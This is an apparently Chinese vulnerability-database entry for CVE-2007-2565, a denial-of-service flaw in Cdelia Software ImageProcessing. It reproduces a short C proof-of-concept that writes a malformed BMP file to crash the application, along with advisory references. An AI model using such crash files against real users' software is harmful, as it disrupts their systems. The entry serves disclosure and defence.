Cdelia Software ImageProcessing 畸形的BMP文件拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112779 漏洞类型 其他
发布时间 2007-04-24 更新时间 2007-06-19
CVE编号 CVE-2007-2565 CNNVD-ID CNNVD-200705-181
漏洞平台 Windows CVSS评分 7.1
|漏洞来源
https://www.exploit-db.com/exploits/29896
https://cxsecurity.com/issue/WLB-2007050041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-181
|漏洞详情
CdeliaSoftwareImageProcessing允许用户协助式远程攻击者借助一个特制的BMP文件,引起拒绝服务攻击(应用程序崩溃)。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/23629/info

Cdelia Software ImageProcessing is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. 
*/

/*
**********************************
## Exploit Coded By Dr.Ninux ##
##       www.LeZr.com        ##
##  LeZr.com Security Team   ##
##    Dr.Ninux@bsdmail.org   ##
**********************************
## 24 April 2007 , Tuesday
## This exploit will create an image (bmp)
## try to open it with "ImageProcessing" from Cdelia Software co.
## then the program will be die...!
**********************************
##
## grEEts to:
## Dr.Virus9,Qptan(Linux_Drox),Q8trojan,BataWeel,SAUDI,RoDhEDoR,
## Arab4services.com,The_DoN,aseer-alnjoom,Maxy,hacaar...AND milw0rm.com
##
*/

#include <stdio.h
#include <stdlib.h

#define INV_PIC "die.bmp"

int main()
{

      int i=0;
      char inv_[]="LOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOL";
      FILE* inv_pic;

      printf("\t\t**********************************\n");
      printf("\t\t  ## Exploit Coded By Dr.Ninux ##\n");
      printf("\t\t  ##       www.LeZr.com        ##\n");
      printf("\t\t  ##  LeZr.com Security Team   ##\n");
      printf("\t\t  ##    Dr.Ninux@bsdmail.org   ##\n");
      printf("\t\t**********************************\n");
      printf("\n");

      if((inv_pic=fopen(INV_PIC,"wb"))==NULL)
      {
              printf("error:foepn().\n");
              exit(0);
      }

      printf("[+]Creating |invalid picture| ... plz wait.\n");

      for(i=0;i<sizeof(inv_);i++)
      {
              fputc(inv_[i],inv_pic);
      }

      fclose(inv_pic);
      printf("[+]BMP File %s Successfuly Created...\n",INV_PIC);

      return 0;
}
|参考资料

来源:BID
名称:23629
链接:http://www.securityfocus.com/bid/23629
来源:BUGTRAQ
名称:20070424Re:ImageProcessing...Local(DenialofServiceExploit)
链接:http://www.securityfocus.com/archive/1/archive/1/466786/100/100/threaded
来源:BUGTRAQ
名称:20070424ImageProcessing...Local(DenialofServiceExploit)
链接:http://www.securityfocus.com/archive/1/archive/1/466754/100/100/threaded
来源:OSVDB
名称:39020
链接:http://osvdb.org/39020
来源:SREASON
名称:2687
链接:http://securityreason.com/securityalert/2687